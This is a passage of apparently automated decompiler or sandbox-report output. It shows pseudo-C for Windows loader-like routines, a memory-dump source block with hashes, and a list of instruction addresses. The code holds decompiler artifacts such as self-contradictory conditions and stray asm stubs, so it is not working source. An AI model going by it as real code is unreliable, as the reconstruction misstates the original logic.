                                          								L31:
                                          								_t229 = _t241;
                                          								goto L14;
                                          							}
                                          							_v73 = 1;
                                          							_v64 = _t240;
                                          							asm("lock bts dword [esi], 0x0");
                                          							if(_t275 < 0) {
                                          								_t231 =  *0x1008608; // 0x0
                                          								while(1) {
                                          									_v60 = _t231;
                                          									__eflags = _t231 & 0x00000001;
                                          									if((_t231 & 0x00000001) != 0) {
                                          										goto L76;
                                          									}
                                          									_t73 = _t231 + 1; // 0x1
                                          									_t210 = _t73;
                                          									asm("lock cmpxchg [edi], ecx");
                                          									__eflags = _t231 - _t231;
                                          									if(_t231 != _t231) {
                                          										L92:
                                          										_t133 = E00F46B90(_t210,  &_v64);
                                          										_t262 =  *0x1008608; // 0x0
                                          										L93:
                                          										_t231 = _t262;
                                          										continue;
                                          									}
                                          									_t240 = _v56;
                                          									goto L10;
                                          									L76:
                                          									_t169 = E00F4E180(_t133);
                                          									__eflags = _t169;
                                          									if(_t169 != 0) {
                                          										_push(0xc000004b);
                                          										_push(0xffffffff);
                                          										E00F597C0();
                                          										_t231 = _v68;
                                          									}
                                          									_v72 = 0;
                                          									_v24 =  *( *[fs:0x18] + 0x24);
                                          									_v16 = 3;
                                          									_v28 = 0;
                                          									__eflags = _t231 & 0x00000002;
                                          									if((_t231 & 0x00000002) == 0) {
                                          										_v32 =  &_v36;
                                          										_t174 = _t231 >> 4;
                                          										__eflags = 1 - _t174;
                                          										_v20 = _t174;
                                          										asm("sbb ecx, ecx");
                                          										_t210 = 3 |  &_v36;
                                          										__eflags = _t174;
                                          										if(_t174 == 0) {
                                          											_v20 = 0xfffffffe;
                                          										}
                                          									} else {
                                          										_v32 = 0;
                                          										_v20 = 0xffffffff;
                                          										_v36 = _t231 & 0xfffffff0;
                                          										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                          										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                          									}
                                          									asm("lock cmpxchg [edi], esi");
                                          									_t262 = _t231;
                                          									__eflags = _t262 - _t231;
                                          									if(_t262 != _t231) {
                                          										goto L92;
                                          									} else {
                                          										__eflags = _v72;
                                          										if(_v72 != 0) {
                                          											E00F5006A(0x1008608, _t210);
                                          										}
                                          										__eflags =  *0x7ffe036a - 1;
                                          										if(__eflags <= 0) {
                                          											L89:
                                          											_t133 =  &_v16;
                                          											asm("lock btr dword [eax], 0x1");
                                          											if(__eflags >= 0) {
                                          												goto L93;
                                          											} else {
                                          												goto L90;
                                          											}
                                          											do {
                                          												L90:
                                          												_push(0);
                                          												_push(0x1008608);
                                          												E00F5B180();
                                          												_t133 = _v24;
                                          												__eflags = _t133 & 0x00000004;
                                          											} while ((_t133 & 0x00000004) == 0);
                                          											goto L93;
                                          										} else {
                                          											_t218 =  *0x1006904; // 0x400
                                          											__eflags = _t218;
                                          											if(__eflags == 0) {
                                          												goto L89;
                                          											} else {
                                          												goto L87;
                                          											}
                                          											while(1) {
                                          												L87:
                                          												__eflags = _v16 & 0x00000002;
                                          												if(__eflags == 0) {
                                          													goto L89;
                                          												}
                                          												asm("pause");
                                          												_t218 = _t218 - 1;
                                          												__eflags = _t218;
                                          												if(__eflags != 0) {
                                          													continue;
                                          												}
                                          												goto L89;
                                          											}
                                          											goto L89;
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L10:
                                          							_t229 =  *0x1006e48; // 0x0
                                          							_v72 = _t229;
                                          							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                          								E00F2FFB0(_t198, _t240, 0x1008608);
                                          								_t253 = _v76;
                                          								goto L29;
                                          							} else {
                                          								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                          								asm("lock cmpxchg [esi], ecx");
                                          								_t215 = 1;
                                          								if(1 != 1) {
                                          									while(1) {
                                          										_t246 = _t215 & 0x00000006;
                                          										_t180 = _t215;
                                          										__eflags = _t246 - 2;
                                          										_v56 = _t246;
                                          										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                          										asm("lock cmpxchg [edi], esi");
                                          										_t248 = _v56;
                                          										__eflags = _t180 - _t215;
                                          										if(_t180 == _t215) {
                                          											break;
                                          										}
                                          										_t215 = _t180;
                                          									}
                                          									__eflags = _t248 - 2;
                                          									if(_t248 == 2) {
                                          										__eflags = 0;
                                          										E00F500C2(0x1008608, 0, _t235);
                                          									}
                                          									_t229 = _v72;
                                          								}
                                          								goto L14;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t227 = 0;
                                          				_v75 = 0;
                                          				if(_t128 != 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 415c5fe6023f65e5d8b9fe298d0ecf5e348d3add40979d2765d22a72a755b225
                                          • Instruction ID: 335a1cf3c04610db6225fff6ce6af4b7f104fd4d4d85bb3dbf7ae2514ca28282
                                          • Opcode Fuzzy Hash: 415c5fe6023f65e5d8b9fe298d0ecf5e348d3add40979d2765d22a72a755b225
                                          • Instruction Fuzzy Hash: C0F10031A087419FEB65DF28C8407AABBE1AF85724F54852DFC959B280D779DC40EB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00F2D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				signed int _v36;
                                          				intOrPtr* _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed char _v52;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v100;
                                          				intOrPtr _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				intOrPtr _v120;
                                          				signed int _v132;
                                          				char _v140;
                                          				char _v144;
                                          				char _v157;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v169;
                                          				intOrPtr _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				intOrPtr _v188;
                                          				signed int _v192;
                                          				signed int _v200;
                                          				signed int _v208;
                                          				intOrPtr* _v212;
                                          				char _v216;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t204;
                                          				void* _t208;
                                          				signed int _t211;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				intOrPtr* _t218;
                                          				signed int _t226;
                                          				signed int _t239;
                                          				signed int* _t247;
                                          				signed int _t249;
                                          				void* _t252;
                                          				signed int _t256;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				signed int _t277;
                                          				signed int _t279;
                                          				intOrPtr _t283;
                                          				signed int _t287;
                                          				signed int _t288;
                                          				void* _t289;
                                          				signed char _t290;
                                          				signed int _t292;
                                          				signed int* _t293;
                                          				signed int _t306;
                                          				signed int _t307;
                                          				signed int _t308;
                                          				signed int _t309;
                                          				signed int _t310;
                                          				intOrPtr _t311;
                                          				intOrPtr _t312;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int* _t324;
                                          				signed int _t337;
                                          				signed int _t338;
                                          				signed int _t339;
                                          				signed int* _t340;
                                          				void* _t341;
                                          				signed int _t344;
                                          				signed int _t348;
                                          				signed int _t349;
                                          				signed int _t351;
                                          				intOrPtr _t353;
                                          				void* _t354;
                                          				signed int _t356;
                                          				signed int _t358;
                                          				intOrPtr _t359;
                                          				signed int _t363;
                                          				signed short* _t365;
                                          				void* _t367;
                                          				intOrPtr _t369;
                                          				void* _t370;
                                          				signed int _t371;
                                          				signed int _t372;
                                          				void* _t374;
                                          				signed int _t376;
                                          				void* _t384;
                                          				signed int _t387;
                                          
                                          				_v8 =  *0x100d360 ^ _t376;
                                          				_t2 =  &_a20;
                                          				 *_t2 = _a20 & 0x00000001;
                                          				_t287 = _a4;
                                          				_v200 = _a12;
                                          				_t365 = _a8;
                                          				_v212 = _a16;
                                          				_v180 = _a24;
                                          				_v168 = 0;
                                          				_v157 = 0;
                                          				if( *_t2 != 0) {
                                          					__eflags = E00F26600(0x10052d8);
                                          					if(__eflags == 0) {
                                          						goto L1;
                                          					} else {
                                          						_v188 = 6;
                                          					}
                                          				} else {
                                          					L1:
                                          					_v188 = 9;
                                          				}
                                          				if(_t365 == 0) {
                                          					_v164 = 0;
                                          					goto L5;
                                          				} else {
                                          					_t363 =  *_t365 & 0x0000ffff;
                                          					_t341 = _t363 + 1;
                                          					if((_t365[1] & 0x0000ffff) < _t341) {
                                          						L109:
                                          						__eflags = _t341 - 0x80;
                                          						if(_t341 <= 0x80) {
                                          							_t281 =  &_v140;
                                          							_v164 =  &_v140;
                                          							goto L114;
                                          						} else {
                                          							_t283 =  *0x1007b9c; // 0x0
                                          							_t281 = L00F34620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                          							_v164 = _t281;
                                          							__eflags = _t281;
                                          							if(_t281 != 0) {
                                          								_v157 = 1;
                                          								L114:
                                          								E00F5F3E0(_t281, _t365[2], _t363);
                                          								_t200 = _v164;
                                          								 *((char*)(_v164 + _t363)) = 0;
                                          								goto L5;
                                          							} else {
                                          								_t204 = 0xc000009a;
                                          								goto L47;
                                          							}
                                          						}
                                          					} else {
                                          						_t200 = _t365[2];
                                          						_v164 = _t200;
                                          						if( *((char*)(_t200 + _t363)) != 0) {
                                          							goto L109;
                                          						} else {
                                          							while(1) {
                                          								L5:
                                          								_t353 = 0;
                                          								_t342 = 0x1000;
                                          								_v176 = 0;
                                          								if(_t287 == 0) {
                                          									break;
                                          								}
                                          								_t384 = _t287 -  *0x1007b90; // 0x779c0000
                                          								if(_t384 == 0) {
                                          									_t353 =  *0x1007b8c; // 0xaa2ad0
                                          									_v176 = _t353;
                                          									_t320 = ( *(_t353 + 0x50))[8];
                                          									_v184 = _t320;
                                          								} else {
                                          									E00F32280(_t200, 0x10084d8);
                                          									_t277 =  *0x10085f4; // 0xaa2fc0
                                          									_t351 =  *0x10085f8 & 1;
                                          									while(_t277 != 0) {
                                          										_t337 =  *(_t277 - 0x50);
                                          										if(_t337 > _t287) {
                                          											_t338 = _t337 | 0xffffffff;
                                          										} else {
                                          											asm("sbb ecx, ecx");
                                          											_t338 =  ~_t337;
                                          										}
                                          										_t387 = _t338;
                                          										if(_t387 < 0) {
                                          											_t339 =  *_t277;
                                          											__eflags = _t351;
                                          											if(_t351 != 0) {
                                          												__eflags = _t339;
                                          												if(_t339 == 0) {
                                          													goto L16;
                                          												} else {
                                          													goto L118;
                                          												}
                                          												goto L151;
                                          											} else {
                                          												goto L16;
                                          											}
                                          											goto L17;
                                          										} else {
                                          											if(_t387 <= 0) {
                                          												__eflags = _t277;
                                          												if(_t277 != 0) {
                                          													_t340 =  *(_t277 - 0x18);
                                          													_t24 = _t277 - 0x68; // 0xaa2f58
                                          													_t353 = _t24;
                                          													_v176 = _t353;
                                          													__eflags = _t340[3] - 0xffffffff;
                                          													if(_t340[3] != 0xffffffff) {
                                          														_t279 =  *_t340;
                                          														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                          														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                          															asm("lock inc dword [edi+0x9c]");
                                          															_t340 =  *(_t353 + 0x50);
                                          														}
                                          													}
                                          													_v184 = _t340[8];
                                          												}
                                          											} else {
                                          												_t339 =  *(_t277 + 4);
                                          												if(_t351 != 0) {
                                          													__eflags = _t339;
                                          													if(_t339 == 0) {
                                          														goto L16;
                                          													} else {
                                          														L118:
                                          														_t277 = _t277 ^ _t339;
                                          														goto L17;
                                          													}
                                          													goto L151;
                                          												} else {
                                          													L16:
                                          													_t277 = _t339;
                                          												}
                                          												goto L17;
                                          											}
                                          										}
                                          										goto L25;
                                          										L17:
                                          									}
                                          									L25:
                                          									E00F2FFB0(_t287, _t353, 0x10084d8);
                                          									_t320 = _v184;
                                          									_t342 = 0x1000;
                                          								}
                                          								if(_t353 == 0) {
                                          									break;
                                          								} else {
                                          									_t366 = 0;
                                          									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                          										_t288 = _v164;
                                          										if(_t353 != 0) {
                                          											_t342 = _t288;
                                          											_t374 = E00F6CC99(_t353, _t288, _v200, 1,  &_v168);
                                          											if(_t374 >= 0) {
                                          												if(_v184 == 7) {
                                          													__eflags = _a20;
                                          													if(__eflags == 0) {
                                          														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                          														if(__eflags != 0) {
                                          															_t271 = E00F26600(0x10052d8);
                                          															__eflags = _t271;
                                          															if(__eflags == 0) {
                                          																_t342 = 0;
                                          																_v169 = _t271;
                                          																_t374 = E00F27926( *(_t353 + 0x50), 0,  &_v169);
                                          															}
                                          														}
                                          													}
                                          												}
                                          												if(_t374 < 0) {
                                          													_v168 = 0;
                                          												} else {
                                          													if( *0x100b239 != 0) {
                                          														_t342 =  *(_t353 + 0x18);
                                          														E00F9E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                          													}
                                          													if( *0x1008472 != 0) {
                                          														_v192 = 0;
                                          														_t342 =  *0x7ffe0330;
                                          														asm("ror edi, cl");
                                          														 *0x100b1e0( &_v192, _t353, _v168, 0, _v180);
                                          														 *( *0x100b218 ^  *0x7ffe0330)();
                                          														_t269 = _v192;
                                          														_t353 = _v176;
                                          														__eflags = _t269;
                                          														if(__eflags != 0) {
                                          															_v168 = _t269;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                          												_t366 = 0xc000007a;
                                          											}
                                          											_t247 =  *(_t353 + 0x50);
                                          											if(_t247[3] == 0xffffffff) {
                                          												L40:
                                          												if(_t366 == 0xc000007a) {
                                          													__eflags = _t288;
                                          													if(_t288 == 0) {
                                          														goto L136;
                                          													} else {
                                          														_t366 = 0xc0000139;
                                          													}
                                          													goto L54;
                                          												}
                                          											} else {
                                          												_t249 =  *_t247;
                                          												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                          													goto L40;
                                          												} else {
                                          													_t250 = _t249 | 0xffffffff;
                                          													asm("lock xadd [edi+0x9c], eax");
                                          													if((_t249 | 0xffffffff) == 0) {
                                          														E00F32280(_t250, 0x10084d8);
                                          														_t342 =  *(_t353 + 0x54);
                                          														_t165 = _t353 + 0x54; // 0x54
                                          														_t252 = _t165;
                                          														__eflags =  *(_t342 + 4) - _t252;
                                          														if( *(_t342 + 4) != _t252) {
                                          															L135:
                                          															asm("int 0x29");
                                          															L136:
                                          															_t288 = _v200;
                                          															_t366 = 0xc0000138;
                                          															L54:
                                          															_t342 = _t288;
                                          															L00F53898(0, _t288, _t366);
                                          														} else {
                                          															_t324 =  *(_t252 + 4);
                                          															__eflags =  *_t324 - _t252;
                                          															if( *_t324 != _t252) {
                                          																goto L135;
                                          															} else {
                                          																 *_t324 = _t342;
                                          																 *(_t342 + 4) = _t324;
                                          																_t293 =  *(_t353 + 0x50);
                                          																_v180 =  *_t293;
                                          																E00F2FFB0(_t293, _t353, 0x10084d8);
                                          																__eflags =  *((short*)(_t353 + 0x3a));
                                          																if( *((short*)(_t353 + 0x3a)) != 0) {
                                          																	_t342 = 0;
                                          																	__eflags = 0;
                                          																	E00F537F5(_t353, 0);
                                          																}
                                          																E00F50413(_t353);
                                          																_t256 =  *(_t353 + 0x48);
                                          																__eflags = _t256;
                                          																if(_t256 != 0) {
                                          																	__eflags = _t256 - 0xffffffff;
                                          																	if(_t256 != 0xffffffff) {
                                          																		E00F49B10(_t256);
                                          																	}
                                          																}
                                          																__eflags =  *(_t353 + 0x28);
                                          																if( *(_t353 + 0x28) != 0) {
                                          																	_t174 = _t353 + 0x24; // 0x24
                                          																	E00F402D6(_t174);
                                          																}
                                          																L00F377F0( *0x1007b98, 0, _t353);
                                          																__eflags = _v180 - _t293;
                                          																if(__eflags == 0) {
                                          																	E00F4C277(_t293, _t366);
                                          																}
                                          																_t288 = _v164;
                                          																goto L40;
                                          															}
                                          														}
                                          													} else {
                                          														goto L40;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										L00F2EC7F(_t353);
                                          										L00F419B8(_t287, 0, _t353, 0);
                                          										_t200 = E00F1F4E3(__eflags);
                                          										continue;
                                          									}
                                          								}
                                          								L41:
                                          								if(_v157 != 0) {
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                          								}
                                          								if(_t366 < 0 || ( *0x100b2f8 |  *0x100b2fc) == 0 || ( *0x100b2e4 & 0x00000001) != 0) {
                                          									L46:
                                          									 *_v212 = _v168;
                                          									_t204 = _t366;
                                          									L47:
                                          									_pop(_t354);
                                          									_pop(_t367);
                                          									_pop(_t289);
                                          									return E00F5B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                          								} else {
                                          									_v200 = 0;
                                          									if(( *0x100b2ec >> 0x00000008 & 0x00000003) == 3) {
                                          										_t355 = _v168;
                                          										_t342 =  &_v208;
                                          										_t208 = E00FC6B68(_v168,  &_v208, _v168, __eflags);
                                          										__eflags = _t208 - 1;
                                          										if(_t208 == 1) {
                                          											goto L46;
                                          										} else {
                                          											__eflags = _v208 & 0x00000010;
                                          											if((_v208 & 0x00000010) == 0) {
                                          												goto L46;
                                          											} else {
                                          												_t342 = 4;
                                          												_t366 = E00FC6AEB(_t355, 4,  &_v216);
                                          												__eflags = _t366;
                                          												if(_t366 >= 0) {
                                          													goto L46;
                                          												} else {
                                          													asm("int 0x29");
                                          													_t356 = 0;
                                          													_v44 = 0;
                                          													_t290 = _v52;
                                          													__eflags = 0;
                                          													if(0 == 0) {
                                          														L108:
                                          														_t356 = 0;
                                          														_v44 = 0;
                                          														goto L63;
                                          													} else {
                                          														__eflags = 0;
                                          														if(0 < 0) {
                                          															goto L108;
                                          														}
                                          														L63:
                                          														_v112 = _t356;
                                          														__eflags = _t356;
                                          														if(_t356 == 0) {
                                          															L143:
                                          															_v8 = 0xfffffffe;
                                          															_t211 = 0xc0000089;
                                          														} else {
                                          															_v36 = 0;
                                          															_v60 = 0;
                                          															_v48 = 0;
                                          															_v68 = 0;
                                          															_v44 = _t290 & 0xfffffffc;
                                          															E00F2E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                          															_t306 = _v68;
                                          															__eflags = _t306;
                                          															if(_t306 == 0) {
                                          																_t216 = 0xc000007b;
                                          																_v36 = 0xc000007b;
                                          																_t307 = _v60;
                                          															} else {
                                          																__eflags = _t290 & 0x00000001;
                                          																if(__eflags == 0) {
                                          																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                          																	__eflags = _t349 - 0x10b;
                                          																	if(_t349 != 0x10b) {
                                          																		__eflags = _t349 - 0x20b;
                                          																		if(_t349 == 0x20b) {
                                          																			goto L102;
                                          																		} else {
                                          																			_t307 = 0;
                                          																			_v48 = 0;
                                          																			_t216 = 0xc000007b;
                                          																			_v36 = 0xc000007b;
                                          																			goto L71;
                                          																		}
                                          																	} else {
                                          																		L102:
                                          																		_t307 =  *(_t306 + 0x50);
                                          																		goto L69;
                                          																	}
                                          																	goto L151;
                                          																} else {
                                          																	_t239 = L00F2EAEA(_t290, _t290, _t356, _t366, __eflags);
                                          																	_t307 = _t239;
                                          																	_v60 = _t307;
                                          																	_v48 = _t307;
                                          																	__eflags = _t307;
                                          																	if(_t307 != 0) {
                                          																		L70:
                                          																		_t216 = _v36;
                                          																	} else {
                                          																		_push(_t239);
                                          																		_push(0x14);
                                          																		_push( &_v144);
                                          																		_push(3);
                                          																		_push(_v44);
                                          																		_push(0xffffffff);
                                          																		_t319 = E00F59730();
                                          																		_v36 = _t319;
                                          																		__eflags = _t319;
                                          																		if(_t319 < 0) {
                                          																			_t216 = 0xc000001f;
                                          																			_v36 = 0xc000001f;
                                          																			_t307 = _v60;
                                          																		} else {
                                          																			_t307 = _v132;
                                          																			L69:
                                          																			_v48 = _t307;
                                          																			goto L70;
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															L71:
                                          															_v72 = _t307;
                                          															_v84 = _t216;
                                          															__eflags = _t216 - 0xc000007b;
                                          															if(_t216 == 0xc000007b) {
                                          																L150:
                                          																_v8 = 0xfffffffe;
                                          																_t211 = 0xc000007b;
                                          															} else {
                                          																_t344 = _t290 & 0xfffffffc;
                                          																_v76 = _t344;
                                          																__eflags = _v40 - _t344;
                                          																if(_v40 <= _t344) {
                                          																	goto L150;
                                          																} else {
                                          																	__eflags = _t307;
                                          																	if(_t307 == 0) {
                                          																		L75:
                                          																		_t217 = 0;
                                          																		_v104 = 0;
                                          																		__eflags = _t366;
                                          																		if(_t366 != 0) {
                                          																			__eflags = _t290 & 0x00000001;
                                          																			if((_t290 & 0x00000001) != 0) {
                                          																				_t217 = 1;
                                          																				_v104 = 1;
                                          																			}
                                          																			_t290 = _v44;
                                          																			_v52 = _t290;
                                          																		}
                                          																		__eflags = _t217 - 1;
                                          																		if(_t217 != 1) {
                                          																			_t369 = 0;
                                          																			_t218 = _v40;
                                          																			goto L91;
                                          																		} else {
                                          																			_v64 = 0;
                                          																			E00F2E9C0(1, _t290, 0, 0,  &_v64);
                                          																			_t309 = _v64;
                                          																			_v108 = _t309;
                                          																			__eflags = _t309;
                                          																			if(_t309 == 0) {
                                          																				goto L143;
                                          																			} else {
                                          																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                          																				__eflags = _t226 - 0x10b;
                                          																				if(_t226 != 0x10b) {
                                          																					__eflags = _t226 - 0x20b;
                                          																					if(_t226 != 0x20b) {
                                          																						goto L143;
                                          																					} else {
                                          																						_t371 =  *(_t309 + 0x98);
                                          																						goto L83;
                                          																					}
                                          																				} else {
                                          																					_t371 =  *(_t309 + 0x88);
                                          																					L83:
                                          																					__eflags = _t371;
                                          																					if(_t371 != 0) {
                                          																						_v80 = _t371 - _t356 + _t290;
                                          																						_t310 = _v64;
                                          																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                          																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                          																						_t311 = 0;
                                          																						__eflags = 0;
                                          																						while(1) {
                                          																							_v120 = _t311;
                                          																							_v116 = _t348;
                                          																							__eflags = _t311 - _t292;
                                          																							if(_t311 >= _t292) {
                                          																								goto L143;
                                          																							}
                                          																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                          																							__eflags = _t371 - _t359;
                                          																							if(_t371 < _t359) {
                                          																								L98:
                                          																								_t348 = _t348 + 0x28;
                                          																								_t311 = _t311 + 1;
                                          																								continue;
                                          																							} else {
                                          																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                          																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                          																									goto L98;
                                          																								} else {
                                          																									__eflags = _t348;
                                          																									if(_t348 == 0) {
                                          																										goto L143;
                                          																									} else {
                                          																										_t218 = _v40;
                                          																										_t312 =  *_t218;
                                          																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                          																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                          																											_v100 = _t359;
                                          																											_t360 = _v108;
                                          																											_t372 = L00F28F44(_v108, _t312);
                                          																											__eflags = _t372;
                                          																											if(_t372 == 0) {
                                          																												goto L143;
                                          																											} else {
                                          																												_t290 = _v52;
                                          																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00F53C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                          																												_t307 = _v72;
                                          																												_t344 = _v76;
                                          																												_t218 = _v40;
                                          																												goto L91;
                                          																											}
                                          																										} else {
                                          																											_t290 = _v52;
                                          																											_t307 = _v72;
                                          																											_t344 = _v76;
                                          																											_t369 = _v80;
                                          																											L91:
                                          																											_t358 = _a4;
                                          																											__eflags = _t358;
                                          																											if(_t358 == 0) {
                                          																												L95:
                                          																												_t308 = _a8;
                                          																												__eflags = _t308;
                                          																												if(_t308 != 0) {
                                          																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                          																												}
                                          																												_v8 = 0xfffffffe;
                                          																												_t211 = _v84;
                                          																											} else {
                                          																												_t370 =  *_t218 - _t369 + _t290;
                                          																												 *_t358 = _t370;
                                          																												__eflags = _t370 - _t344;
                                          																												if(_t370 <= _t344) {
                                          																													L149:
                                          																													 *_t358 = 0;
                                          																													goto L150;
                                          																												} else {
                                          																													__eflags = _t307;
                                          																													if(_t307 == 0) {
                                          																														goto L95;
                                          																													} else {
                                          																														__eflags = _t370 - _t344 + _t307;
                                          																														if(_t370 >= _t344 + _t307) {
                                          																															goto L149;
                                          																														} else {
                                          																															goto L95;
                                          																														}
                                          																													}
                                          																												}
                                          																											}
                                          																										}
                                          																									}
                                          																								}
                                          																							}
                                          																							goto L97;
                                          																						}
                                          																					}
                                          																					goto L143;
                                          																				}
                                          																			}
                                          																		}
                                          																	} else {
                                          																		__eflags = _v40 - _t307 + _t344;
                                          																		if(_v40 >= _t307 + _t344) {
                                          																			goto L150;
                                          																		} else {
                                          																			goto L75;
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          														}
                                          														L97:
                                          														 *[fs:0x0] = _v20;
                                          														return _t211;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										goto L46;
                                          									}
                                          								}
                                          								goto L151;
                                          							}
                                          							_t288 = _v164;
                                          							_t366 = 0xc0000135;
                                          							goto L41;
                                          						}
                                          					}
                                          				}
                                          				L151:
                                          			}

                                          0x00f2dce7
                                          0x00f2dce7
                                          0x00f2dce7
                                          0x00000000
                                          0x00f2dce7
                                          0x00000000
                                          0x00f2db2a
                                          0x00f2db2c
                                          0x00f2db31
                                          0x00f2db33
                                          0x00f2db36
                                          0x00f2db39
                                          0x00f2db3b
                                          0x00f2db66
                                          0x00f2db66
                                          0x00f2db3d
                                          0x00f2db3d
                                          0x00f2db3e
                                          0x00f2db46
                                          0x00f2db47
                                          0x00f2db49
                                          0x00f2db4c
                                          0x00f2db53
                                          0x00f2db55
                                          0x00f2db58
                                          0x00f2db5a
                                          0x00f7b50a
                                          0x00f7b50f
                                          0x00f7b512
                                          0x00f2db60
                                          0x00f2db60
                                          0x00f2db63
                                          0x00f2db63
                                          0x00000000
                                          0x00f2db63
                                          0x00f2db5a
                                          0x00f2db3b
                                          0x00f2db24
                                          0x00f2db69
                                          0x00f2db69
                                          0x00f2db6c
                                          0x00f2db6f
                                          0x00f2db74
                                          0x00f7b557
                                          0x00f7b557
                                          0x00f7b55e
                                          0x00f2db7a
                                          0x00f2db7c
                                          0x00f2db7f
                                          0x00f2db82
                                          0x00f2db85
                                          0x00000000
                                          0x00f2db8b
                                          0x00f2db8b
                                          0x00f2db8d
                                          0x00f2db9b
                                          0x00f2db9b
                                          0x00f2db9d
                                          0x00f2dba0
                                          0x00f2dba2
                                          0x00f2dba4
                                          0x00f2dba7
                                          0x00f2dba9
                                          0x00f2dbae
                                          0x00f2dbae
                                          0x00f2dbb1
                                          0x00f2dbb4
                                          0x00f2dbb4
                                          0x00f2dbb7
                                          0x00f2dbba
                                          0x00f2dcd2
                                          0x00f2dcd4
                                          0x00000000
                                          0x00f2dbc0
                                          0x00f2dbc0
                                          0x00f2dbd2
                                          0x00f2dbd7
                                          0x00f2dbda
                                          0x00f2dbdd
                                          0x00f2dbdf
                                          0x00000000
                                          0x00f2dbe5
                                          0x00f2dbe5
                                          0x00f2dbee
                                          0x00f2dbf1
                                          0x00f7b541
                                          0x00f7b544
                                          0x00000000
                                          0x00f7b546
                                          0x00f7b546
                                          0x00000000
                                          0x00f7b546
                                          0x00f2dbf7
                                          0x00f2dbf7
                                          0x00f2dbfd
                                          0x00f2dbfd
                                          0x00f2dbff
                                          0x00f2dc0b
                                          0x00f2dc15
                                          0x00f2dc1b
                                          0x00f2dc1d
                                          0x00f2dc21
                                          0x00f2dc21
                                          0x00f2dc23
                                          0x00f2dc23
                                          0x00f2dc26
                                          0x00f2dc29
                                          0x00f2dc2b
                                          0x00000000
                                          0x00000000
                                          0x00f2dc31
                                          0x00f2dc34
                                          0x00f2dc36
                                          0x00f2dcbf
                                          0x00f2dcbf
                                          0x00f2dcc2
                                          0x00000000
                                          0x00f2dc3c
                                          0x00f2dc41
                                          0x00f2dc43
                                          0x00000000
                                          0x00f2dc45
                                          0x00f2dc45
                                          0x00f2dc47
                                          0x00000000
                                          0x00f2dc4d
                                          0x00f2dc4d
                                          0x00f2dc50
                                          0x00f2dc52
                                          0x00f2dc55
                                          0x00f2dcfa
                                          0x00f2dcfe
                                          0x00f2dd08
                                          0x00f2dd0a
                                          0x00f2dd0c
                                          0x00000000
                                          0x00f2dd12
                                          0x00f2dd15
                                          0x00f2dd2d
                                          0x00f2dd2f
                                          0x00f2dd32
                                          0x00f2dd35
                                          0x00000000
                                          0x00f2dd35
                                          0x00f2dc5b
                                          0x00f2dc5b
                                          0x00f2dc5e
                                          0x00f2dc61
                                          0x00f2dc64
                                          0x00f2dc67
                                          0x00f2dc67
                                          0x00f2dc6a
                                          0x00f2dc6c
                                          0x00f2dc8e
                                          0x00f2dc8e
                                          0x00f2dc91
                                          0x00f2dc93
                                          0x00f2dcce
                                          0x00f2dcce
                                          0x00f2dc95
                                          0x00f2dc9c
                                          0x00f2dc6e
